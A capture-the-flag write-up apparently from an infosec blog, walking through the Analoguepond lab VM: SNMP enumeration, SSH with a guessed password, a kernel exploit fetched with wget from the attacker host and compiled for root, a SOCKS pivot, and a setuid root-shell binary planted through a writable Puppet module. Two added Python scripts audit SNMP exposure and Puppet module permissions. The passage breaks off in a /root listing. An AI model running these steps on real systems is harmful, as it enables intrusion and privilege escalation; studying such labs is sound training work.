Mr_H4sh

Infosec, CTF and more

Analoguepond Solution

In this post I’m going to show you how to solve the Analoguepond VM provided by knightmare.

You can find the VM at this link.

The goal of the VM is to gain root access on 3 machines and capture the flags mentioned in the description of the VM.

Attacker: 192.168.56.1
Victim: 192.168.56.101

I run an nmap TCP scan and find port 22 open. I run an nmap UDP scan and find port 161 (SNMP) open.

I use onesixtyone to find out which SNMP community strings the system accepts, and I find that the “public” community is available:

$ onesixtyone -c community 192.168.56.101
Scanning 1 hosts, 2 communities
192.168.56.101 [public] Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64

Then I use snmpwalk to get the info with the public community:

$ snmpwalk -Os -c public -v 1 192.168.56.101
iso.3.6.1.2.1.1.1.0 = STRING: "Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (81059) 0:13:30.59
iso.3.6.1.2.1.1.4.0 = STRING: "Eric Burdon <eric@example.com>"
iso.3.6.1.2.1.1.5.0 = STRING: "analoguepond"
iso.3.6.1.2.1.1.6.0 = STRING: "There is a house in New Orleans they call it..."
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."
iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.25.1.1.0 = Timeticks: (81951) 0:13:39.51
iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E1 04 12 11 38 0A 00 2B 01 00 
iso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216
iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-3.19.0-25-generic root=/dev/mapper/analoguepond--vg-root ro
"
iso.3.6.1.2.1.25.1.5.0 = Gauge32: 0
iso.3.6.1.2.1.25.1.6.0 = Gauge32: 26
iso.3.6.1.2.1.25.1.7.0 = INTEGER: 0
End of MIB

Ok, so we have a user called eric (from the sysContact e-mail address), and in the snmpwalk output we find the following sentence:

iso.3.6.1.2.1.1.6.0 = STRING: "There is a house in New Orleans they call it..."

I google the sentence, and I find out that the whole sentence is “There is a house in New Orleans they call it the rising sun”.
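What the read-only “public” community hands out here (sysDescr, sysContact, sysName, sysLocation and the boot parameters) is the whole point of this step, so here is an added Python example, not part of the original write-up, that parses the snmpwalk -Os output format above into named MIB-II and HOST-RESOURCES fields. The sample lines are constructed from the output above; the multi-line STRING value (the BOOT_IMAGE entry, whose closing quote sits on the next line) is the edge case the parser has to handle. From the defender's side this is exactly what an exposure check can pull from an agent left on its default community, and the fix on the agent is to restrict the community and its view in snmpd.conf, or move to SNMPv3.

```python
import re

# Constructed sample in the `snmpwalk -Os -c public -v 1` output format shown
# above (numeric OIDs under the "iso." prefix). The BOOT_IMAGE STRING value
# spans two lines, exactly as in the real output.
SAMPLE_WALK = "\n".join([
    'iso.3.6.1.2.1.1.1.0 = STRING: "Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64"',
    'iso.3.6.1.2.1.1.3.0 = Timeticks: (81059) 0:13:30.59',
    'iso.3.6.1.2.1.1.4.0 = STRING: "Eric Burdon <eric@example.com>"',
    'iso.3.6.1.2.1.1.5.0 = STRING: "analoguepond"',
    'iso.3.6.1.2.1.1.6.0 = STRING: "There is a house in New Orleans they call it..."',
    'iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-3.19.0-25-generic root=/dev/mapper/analoguepond--vg-root ro',
    '"',
    'End of MIB',
])

# Names for the OIDs of interest (MIB-II system group, HOST-RESOURCES-MIB).
NAMED_OIDS = {
    "iso.3.6.1.2.1.1.1.0": "sysDescr",
    "iso.3.6.1.2.1.1.4.0": "sysContact",
    "iso.3.6.1.2.1.1.5.0": "sysName",
    "iso.3.6.1.2.1.1.6.0": "sysLocation",
    "iso.3.6.1.2.1.25.1.4.0": "hrSystemInitialLoadParameters",
}

# "<oid> = <TYPE>: <value>"; TYPE covers STRING, Hex-STRING, OID, Timeticks, ...
LINE_RE = re.compile(r'^(?P<oid>iso[\d.]+) = (?P<type>[A-Za-z0-9-]+): ?(?P<value>.*)$')


def parse_snmpwalk(text):
    """Parse snmpwalk -Os output into {oid: (type, value)}.

    STRING values are returned without their surrounding quotes; a STRING whose
    closing quote sits on a later line is joined back together first."""
    result = {}
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        m = LINE_RE.match(lines[i])
        i += 1
        if not m:
            continue                      # e.g. the trailing "End of MIB"
        oid, vtype, value = m.group("oid", "type", "value")
        if vtype == "STRING" and value.startswith('"'):
            # keep consuming lines until the closing quote shows up
            while not (len(value) >= 2 and value.endswith('"')) and i < len(lines):
                value += "\n" + lines[i]
                i += 1
            if len(value) >= 2 and value.endswith('"'):
                value = value[1:-1]
        result[oid] = (vtype, value)
    return result


def system_summary(walk):
    """The human-readable fields a read-only community gives away."""
    return {name: walk[oid][1] for oid, name in NAMED_OIDS.items() if oid in walk}


def kernel_release(sysdescr):
    """Kernel release from a Linux sysDescr ("Linux <host> <release> ...")."""
    parts = sysdescr.split()
    return parts[2] if len(parts) >= 3 and parts[0] == "Linux" else None


if __name__ == "__main__":
    for name, value in system_summary(parse_snmpwalk(SAMPLE_WALK)).items():
        print(f"{name:30s} {value!r}")
```

The kernel release pulled from sysDescr is what makes an exposed agent useful to an inventory (and to an attacker choosing a kernel exploit, as the next step of this write-up shows), which is why sysDescr alone justifies locking the community down.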

I ssh into the box using the credentials eric:therisingsun, and I’m in:

$ ssh eric@192.168.56.101
eric@192.168.56.101's password: therisingsun
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 3.19.0-25-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

  System information as of Tue Apr 18 17:42:38 BST 2017

  System load: 0.0               Memory usage: 1%   Processes:       79
  Usage of /:  80.7% of 5.39GB   Swap usage:   0%   Users logged in: 0

  Graph this data and manage this system at:
    https://landscape.canonical.com/
eric@analoguepond:~$ 

I look for a way to escalate privileges on this machine, and I find that Ubuntu 14.04 with kernel 3.19.0-25 is running:

eric@analoguepond:~$ uname -a
Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
eric@analoguepond:~$ cat /etc/issue
Ubuntu 14.04.5 LTS  
 
 My IP:  192.168.56.101 

eric@analoguepond:~$ cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.5 LTS"
NAME="Ubuntu"
VERSION="14.04.5 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.5 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"

I find that the following exploit (39166.c) allows me to escalate privileges to root:

eric@analoguepond:~$ wget http://192.168.56.1/39166.c
--2017-04-18 19:46:55--  http://192.168.56.1/39166.c
Connecting to 192.168.56.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2793 (2.7K) [text/x-c]
Saving to: ‘39166.c’

100%[================================================================================================================================================================================================================================>] 2,793       --.-K/s   in 0s      

2017-04-18 19:46:55 (270 MB/s) - ‘39166.c’ saved [2793/2793]

eric@analoguepond:~$ gcc -o exploit 39166.c 
eric@analoguepond:~$ ./exploit 
root@analoguepond:~# whoami
root
root@analoguepond:~# id
uid=0(root) gid=1000(eric) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),111(libvirtd),112(lpadmin),113(sambashare),1000(eric)
root@analoguepond:~# 

So, I get the first troll flag:

root@analoguepond:/root# cat flag.txt 
C'Mon Man! Y'all didn't think this was the final flag so soon...?

Did the bright lights and big city knock you out...? If you pull
a stunt like this again, I'll send you back to Walker...

This is obviously troll flah #1 So keep going.

Time to move on.

I see that the host also has a second network interface on 192.168.122.x, so I ping every address in the range 192.168.122.1-254 and get a reply from the following IP: 192.168.122.3

From the running processes I see that one of the VMs is called barringsbank, so I go to /etc/libvirt/qemu/, where the XML file with the VM definition lives, and I find the following description for the VM, plus the VNC password:

root@analoguepond:/etc/libvirt/qemu# cat barringsbank.xml 
[...]
  <description>Who do you think you are...? David Lightman from memphistennessee...?</description>
[...]
  <graphics type='vnc' port='-1' autoport='yes' passwd='memphistennessee'/>

The other VM is called puppet, and the same applies:

[...]
<description>puppetmaster if you mess with this VM I will sendyoubacktowalker</description>
[...]
<graphics type='vnc' port='-1' autoport='yes' listen='127.0.0.1' passwd='sendyoubacktowalker'>

I see that the VMs’ IPs are the following:

root@analoguepond:/etc/libvirt/qemu/networks# cat default.xml 
<network>
  <name>default</name>
  <uuid>8edd2858-f408-4a4a-86f1-0993b59c6b30</uuid>
  <forward mode='nat'/>
  <bridge name='virbr0' stp='on' delay='0'/>
  <mac address='52:54:00:b2:23:25'/>
  <ip address='192.168.122.1' netmask='255.255.255.0'>
    <dhcp>
      <range start='192.168.122.10' end='192.168.122.15'/>
      <host mac='52:54:00:5b:05:f7' name='puppet' ip='192.168.122.2'/>
      <host mac='52:54:00:6d:93:6a' name='barringsbank' ip='192.168.122.3'/>
    </dhcp>
  </ip>
</network>

I can also see them in the ARP table:

root@analoguepond:/root# arp
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.56.1             ether   0a:00:27:00:00:00   C                     eth0
barringsbank.example.co  ether   52:54:00:6d:93:6a   C                     virbr0
puppet.example.com       ether   52:54:00:5b:05:f7   C                     virbr0

And also in the /etc/hosts file:

root@analoguepond:~# cat /etc/hosts
127.0.0.1	localhost
127.0.1.1	analoguepond.example.com
192.168.122.2	puppet.example.com
192.168.122.3	barringsbank.example.com

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

I check the local listening sockets and I see that the host runs the VMs’ VNC consoles on localhost, so I allow access from the outside world to port 5900:

root@analoguepond:/etc/libvirt/qemu# netstat -tulp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 192.168.122.1:domain    *:*                     LISTEN      1154/dnsmasq    
tcp        0      0 *:ssh                   *:*                     LISTEN      867/sshd        
tcp        0      0 localhost:5900          *:*                     LISTEN      1161/qemu-system-x8
tcp        0      0 localhost:5901          *:*                     LISTEN      1223/qemu-system-x8
tcp6       0      0 [::]:ssh                [::]:*                  LISTEN      867/sshd        
udp        0      0 *:17303                 *:*                                 522/dhclient    
udp        0      0 192.168.122.1:domain    *:*                                 1154/dnsmasq    
udp        0      0 *:bootps                *:*                                 1154/dnsmasq    
udp        0      0 *:bootpc                *:*                                 522/dhclient    
udp        0      0 *:snmp                  *:*                                 943/snmpd       
udp        0      0 *:57563                 *:*                                 943/snmpd       
udp6       0      0 [::]:55245              [::]:*                              522/dhclient    
udp6       0      0 localhost:snmp          [::]:*                              943/snmpd    

This is not accessible from the outside world though.

I set up an SSH SOCKS proxy and proxychains to scan the other hosts’ ports:

$ ssh -NfD 1234 eric@192.168.56.101
eric@192.168.56.101's password:

$ proxychains nmap -sT -Pn -n -v 192.168.122.2
[...]
<--timeout
|S-chain|-<>-127.0.0.1:1234-<><>-192.168.122.2:2968-channel 3: open failed: connect failed: Connection refused
<--timeout
Completed Connect Scan at 22:17, 0.61s elapsed (1000 total ports)
Nmap scan report for 192.168.122.2
Host is up (0.00052s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
22/tcp open  ssh

$ proxychains nmap -Pn -n -v 192.168.122.3
<--timeout
|S-chain|-<>-127.0.0.1:1234-<><>-192.168.122.3:9593-channel 3: open failed: connect failed: Connection refused
<--timeout
Completed Connect Scan at 22:31, 1.03s elapsed (1000 total ports)
Nmap scan report for 192.168.122.3
Host is up (0.00094s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
22/tcp open  ssh

I ssh into the IP 192.168.122.2 and this is what I get:

root@analoguepond:/root# ssh 192.168.122.2
The authenticity of host '192.168.122.2 (192.168.122.2)' can't be established.
ECDSA key fingerprint is 4e:e6:d6:38:8a:9b:3c:aa:0c:55:95:a6:57:ce:f9:e5.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.122.2' (ECDSA) to the list of known hosts.
+-----------------------------------------------------------------------------+
| Passwords are very dated.. Removing spaces helps sandieshaw log in with her |
| most famous song                                                            |
+-----------------------------------------------------------------------------+
root@192.168.122.2's password: 

Ok, as I see from the Wikipedia page, Sandie Shaw’s most famous song is Puppet on a String. Since the machine is called puppet, that must be it. The hint says removing spaces helps, so I try puppetonastring and it works:

root@analoguepond:/root# ssh sandieshaw@192.168.122.2
+-----------------------------------------------------------------------------+
| Passwords are very dated.. Removing spaces helps sandieshaw log in with her |
| most famous song                                                            |
+-----------------------------------------------------------------------------+
sandieshaw@192.168.122.2's password: 
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 4.4.0-57-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

 System information disabled due to load higher than 1.0


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

sandieshaw@puppet:~$ id
uid=1000(sandieshaw) gid=1000(sandieshaw) groups=1000(sandieshaw),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),111(sambashare)
sandieshaw@puppet:~$ /sbin/ifconfig
eth0      Link encap:Ethernet  HWaddr 52:54:00:5b:05:f7  
          inet addr:192.168.122.2  Bcast:192.168.122.255  Mask:255.255.255.0
          inet6 addr: fe80::5054:ff:fe5b:5f7/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:47654 errors:0 dropped:77 overruns:0 frame:0
          TX packets:47428 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:3727680 (3.7 MB)  TX bytes:2761655 (2.7 MB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:898 errors:0 dropped:0 overruns:0 frame:0
          TX packets:898 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:1412896 (1.4 MB)  TX bytes:1412896 (1.4 MB)

sandieshaw@puppet:~$ 

I wander around a bit, and I find out through the Puppet configuration that the machine with the IP 192.168.122.3 has the following users:

sandieshaw@puppet:/etc/puppet/modules/vulnhub/files$ cat barringsbank-passwd 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
nleeson:x:1000:1000:Nicholas Leeson,,,:/home/nleeson:/bin/bash
puppet:x:105:112:Puppet configuration management daemon,,,:/var/lib/puppet:/bin/false

And that users have to ssh in with their public key:

sandieshaw@puppet:/etc/puppet/modules/vulnhub/files$ cat sshd_config 
# Package generated configuration file
# See the sshd_config(5) manpage for details

# What ports, IPs and protocols we listen for
Port 22
# Use these options to restrict which interfaces/protocols sshd will bind to
#ListenAddress ::
#ListenAddress 0.0.0.0
Protocol 2
# HostKeys for protocol version 2
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
HostKey /etc/ssh/ssh_host_ecdsa_key
HostKey /etc/ssh/ssh_host_ed25519_key
#Privilege Separation is turned on for security
UsePrivilegeSeparation yes

# Lifetime and size of ephemeral version 1 server key
KeyRegenerationInterval 3600
ServerKeyBits 1024

# Logging
SyslogFacility AUTH
LogLevel INFO

# Authentication:
LoginGraceTime 120
PermitRootLogin without-password
StrictModes yes

RSAAuthentication yes
PubkeyAuthentication yes
#AuthorizedKeysFile	%h/.ssh/authorized_keys

# Don't read the user's ~/.rhosts and ~/.shosts files
IgnoreRhosts yes
# For this to work you will also need host keys in /etc/ssh_known_hosts
RhostsRSAAuthentication no
# similar for protocol version 2
HostbasedAuthentication no
# Uncomment if you don't trust ~/.ssh/known_hosts for RhostsRSAAuthentication
#IgnoreUserKnownHosts yes

# To enable empty passwords, change to yes (NOT RECOMMENDED)
PermitEmptyPasswords no

# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no

# Change to no to disable tunnelled clear text passwords
#PasswordAuthentication yes

# Kerberos options
#KerberosAuthentication no
#KerberosGetAFSToken no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes

# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes

X11Forwarding no
X11DisplayOffset 10
PrintMotd no
PrintLastLog yes
TCPKeepAlive yes
#UseLogin no

#MaxStartups 10:30:60
Banner /etc/issue.net

# Allow client to pass locale environment variables
AcceptEnv LANG LC_*

Subsystem sftp /usr/lib/openssh/sftp-server

# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication.  Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
UsePAM yes

I look around for a privilege escalation, and I find the file /tmp/spin with the SUID bit set. I run it and it’s just a spinner.

sandieshaw@puppet:/tmp$ find / -perm -4000 2>/dev/null
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/lib/pt_chown
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/chfn
/usr/bin/traceroute6.iputils
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/mtr
/usr/bin/gpasswd
/usr/bin/passwd
/bin/umount
/bin/mount
/bin/fusermount
/bin/ping6
/bin/su
/bin/ping
/tmp/spin

I check the puppet folder again, and I find the source code “spin.c” in the wiggle module for the puppet machine (192.168.122.2):

sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ ls -la
total 732
drwxrwxr-x 2 root       sandieshaw   4096 Dec 21 22:04 .
drwxr-xr-x 4 root       root         4096 Dec 18 18:42 ..
-rwxrwxr-x 1 sandieshaw sandieshaw 733480 Dec 21 21:12 spin
-rw-rw-r-- 1 sandieshaw sandieshaw    376 Dec 17 11:52 spin.c
sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ cat spin.c 
#include <stdio.h>
#include <unistd.h>

void
advance_spinner() {
    static char bars[] = { '/', '-', '\\', '|' };
    static int nbars = sizeof(bars) / sizeof(char);
    static int pos = 0;

    printf("%c\r", bars[pos]);
    fflush(stdout);
    pos = (pos + 1) % nbars;
}

int
main() {
    while (1) {
        advance_spinner();
        usleep(300);
    }

    return 0;
}

Guess what? The owner of the source code and of the executable is sandieshaw. As I can see in /etc/puppet/modules/wiggle/manifests/init.pp, the module ensures that /tmp/spin is present, owned by root with mode 4755, and sourced from the module’s files directory:

sandieshaw@puppet:/etc/puppet/modules/wiggle/manifests$ cat init.pp 
## My first puppet module by Nick Leeson (C) Barringsbank
## Put spin binary in /tmp to confirm puppet is working
class wiggle {

file { [ "/tmp/spin" ]:
  ensure  => present,
  mode    => 4755,
  owner   => root,
  group   => root,
  source  => "puppet:///modules/wiggle/spin";
  }


}
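Why this works deserves spelling out from the defender's side: the wiggle module's files directory is group-writable by sandieshaw and the binary in it is owned by her, while the manifest tells every agent to install that file as a root-owned 4755 binary. Whoever can write to a module's files/ is therefore handing the agent a setuid payload. As an added example that is not part of this write-up, here is a Python audit that checks a module for exactly that pairing: a setuid/setgid mode in manifests/*.pp together with files/ entries owned or writable by an untrusted user. It builds a constructed copy of the wiggle module layout in a temporary directory; the files/ entries get mode 775 to mirror the -rwxrwxr-x listing above, and their owner is whoever runs the script (chown needs root), which the audit flags unless that uid is trusted. The same check applies to the vulnhub module that later serves barringsbank-passwd and sudoers.

```python
import os
import re
import stat
import tempfile

SETUID_OR_SETGID = 0o6000

# Matches `mode => 4755,` as well as `mode => "4755"` / `mode => '0644'`
MODE_RE = re.compile(r"""mode\s*=>\s*['"]?(\d{3,4})['"]?""")

# Constructed copy of the wiggle manifest quoted above.
INIT_PP = '''## My first puppet module by Nick Leeson (C) Barringsbank
## Put spin binary in /tmp to confirm puppet is working
class wiggle {

file { [ "/tmp/spin" ]:
  ensure  => present,
  mode    => 4755,
  owner   => root,
  group   => root,
  source  => "puppet:///modules/wiggle/spin";
  }

}
'''


def privileged_modes_in_manifest(text):
    """Mode values in a manifest that set the setuid or setgid bit."""
    return [m.group(1) for m in MODE_RE.finditer(text)
            if int(m.group(1), 8) & SETUID_OR_SETGID]


def check_entry(path, uid, mode, trusted_uids=(0,)):
    """Flag a served path that an untrusted user owns or can write to."""
    issues = []
    if uid not in trusted_uids:
        issues.append((path, f"owned by uid {uid}, which is not a trusted uid"))
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        issues.append((path, "group- or world-writable"))
    return issues


def audit_module(module_dir, trusted_uids=(0,)):
    """Audit one module directory; returns a list of (path, problem) tuples.

    manifests/*.pp are scanned for setuid/setgid modes, and files/ (the
    directory itself plus everything below it) is checked for ownership and
    write bits, because that is the content the agent installs as root."""
    findings = []
    manifests = os.path.join(module_dir, "manifests")
    if os.path.isdir(manifests):
        for name in sorted(os.listdir(manifests)):
            if not name.endswith(".pp"):
                continue
            path = os.path.join(manifests, name)
            with open(path) as fh:
                for mode in privileged_modes_in_manifest(fh.read()):
                    findings.append((path, f"deploys a setuid/setgid file (mode {mode})"))
    files_dir = os.path.join(module_dir, "files")
    paths = [files_dir] if os.path.isdir(files_dir) else []
    for dirpath, dirnames, filenames in os.walk(files_dir):
        paths += [os.path.join(dirpath, n) for n in dirnames + filenames]
    for path in paths:
        st = os.lstat(path)
        findings.extend(check_entry(path, st.st_uid, st.st_mode, trusted_uids))
    return findings


def worst_case(findings):
    """'critical' when a setuid deploy and an untrusted-controlled source
    coincide: whoever can write the source gets a root-owned setuid binary."""
    setuid = any("setuid" in why for _, why in findings)
    untrusted = any("owned by" in why or "writable" in why for _, why in findings)
    if setuid and untrusted:
        return "critical"
    return "warning" if findings else "ok"


def build_demo_module():
    """Constructed wiggle module layout in a temp dir: files/ and files/spin
    get mode 775 to mirror the -rwxrwxr-x listing in the write-up."""
    root = tempfile.mkdtemp(prefix="wiggle-")
    os.makedirs(os.path.join(root, "manifests"))
    os.makedirs(os.path.join(root, "files"))
    with open(os.path.join(root, "manifests", "init.pp"), "w") as fh:
        fh.write(INIT_PP)
    spin = os.path.join(root, "files", "spin")
    with open(spin, "wb") as fh:
        fh.write(b"\x7fELF placeholder, not a real binary\n")
    os.chmod(spin, 0o775)
    os.chmod(os.path.join(root, "files"), 0o775)
    return root


if __name__ == "__main__":
    demo = build_demo_module()
    found = audit_module(demo)
    for path, why in found:
        print(f"{path}: {why}")
    print("verdict:", worst_case(found))
```

The verdict is deliberately two-sided: a setuid deploy from a root-owned, root-only-writable source is a normal (if noteworthy) configuration, and a writable files/ directory that only serves 0644 content is a weaker problem; it is the combination that turns a configuration-management server into a root-privilege escalation for every agent that pulls the module.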

So, I build another executable and upload it to the same folder:

root@analoguepond:~# cat c_shell.c 
#include <stdio.h>
#include <stdlib.h>     /* system() */
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
    /* run as a root-owned SUID binary: become root, then spawn a shell */
    setuid(0);
    setgid(0);
    system("/bin/sh");
    return 0;
}
root@analoguepond:~# gcc -o spin c_shell.c
root@analoguepond:~# scp spin sandieshaw@192.168.122.2:/etc/puppet/modules/wiggle/files/spin
+-----------------------------------------------------------------------------+
| Passwords are very dated.. Removing spaces helps sandieshaw log in with her |
| most famous song                                                            |
+-----------------------------------------------------------------------------+
sandieshaw@192.168.122.2's password: 
spin                                                           

Now I make sure that the binary is there, and I run puppet agent so that it re-deploys /tmp/spin from the module:

sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ ls -la
total 744
drwxrwxr-x 2 root       sandieshaw   4096 Apr 19 01:36 .
drwxr-xr-x 4 root       root         4096 Dec 18 18:42 ..
-rwxrwxr-x 1 sandieshaw sandieshaw   8627 Apr 19 01:36 spin
-rwxrwxr-x 1 sandieshaw sandieshaw 733480 Dec 21 21:12 spin2
-rw-rw-r-- 1 sandieshaw sandieshaw    376 Dec 17 11:52 spin.c
sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ ./spin
$ id
uid=1000(sandieshaw) gid=1000(sandieshaw) groups=1000(sandieshaw),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),111(sambashare)
$ exit
sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ puppet agent
sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ ls -la /tmp/
total 20
drwxrwxrwt  2 root root 4096 Apr 19 01:42 .
drwxr-xr-x 22 root root 4096 Jan  7 11:45 ..
-rwsr-xr-x  1 root root 8627 Apr 19 01:41 spin
sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ /tmp/spin
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(sandieshaw)

Got root :D

So, I check the /root folder, and this is what I find:

root@puppet:/etc/puppet/modules/wiggle/files# cd /root
root@puppet:/root# ls -la
total 24
